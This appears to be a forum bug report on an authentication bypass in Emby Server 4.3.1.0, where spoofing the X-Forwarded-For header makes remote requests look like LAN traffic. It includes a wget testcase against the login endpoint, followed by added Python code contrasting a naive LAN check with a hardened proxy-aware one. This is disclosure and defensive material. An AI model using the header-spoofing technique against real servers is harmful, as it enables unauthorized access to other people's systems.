Hi,
I've got a premiere Emby-Server V4.3.1.0 running on Windows with remote connections enabled. It seems that one can trick the server into believing that a request is coming from LAN by setting the "X-Forwarded-For" request header. Testcase:
wget --no-check-certificate -O - https://xyz.dyndns.org:8920/Users/authenticatebyname \
--header 'x-emby-authorization: MediaBrowser Client="Emby Web", Device="WGET", DeviceId="XYZ", Version="4.3.1.0"' \
--header 'content-type: application/json'
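
The behaviour reported above, as an added example that is not part of the original post and is not Emby's code: a LAN check that believes "X-Forwarded-For" from any sender, beside one that honours the header only when the TCP peer is a known reverse proxy. The function names, `TRUSTED_PROXIES`, `LAN_NETWORKS` and all addresses are assumptions constructed for illustration.

```python
import ipaddress

# Assumption: only a reverse proxy on the same host may set X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("127.0.0.1/32")]
LAN_NETWORKS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def _in(addr, networks):
    return any(addr in net for net in networks)

def naive_is_lan(peer_ip, headers):
    """Weak pattern: trusts the first X-Forwarded-For entry from any sender."""
    claimed = headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()
    return _in(ipaddress.ip_address(claimed), LAN_NETWORKS)

def effective_client_ip(peer_ip, headers):
    """Return the address to use for access decisions, or None if unknown.
    The header is read only when the socket peer is a trusted proxy; the
    list is walked right to left and the first untrusted hop is the client."""
    peer = ipaddress.ip_address(peer_ip)
    if not _in(peer, TRUSTED_PROXIES):
        return peer  # direct connection: header is attacker-controlled, ignore it
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return None  # malformed entry: origin unknown, fail closed
        if not _in(addr, TRUSTED_PROXIES):
            return addr
    return peer  # no forwarded hops: the request came from the proxy host itself

def hardened_is_lan(peer_ip, headers):
    client = effective_client_ip(peer_ip, headers)
    return client is not None and _in(client, LAN_NETWORKS)

if __name__ == "__main__":
    # Constructed sample: a remote peer claiming a private address in the header.
    spoofed = {"X-Forwarded-For": "192.168.1.10"}
    print("naive:   ", naive_is_lan("203.0.113.7", spoofed))
    print("hardened:", hardened_is_lan("203.0.113.7", spoofed))
```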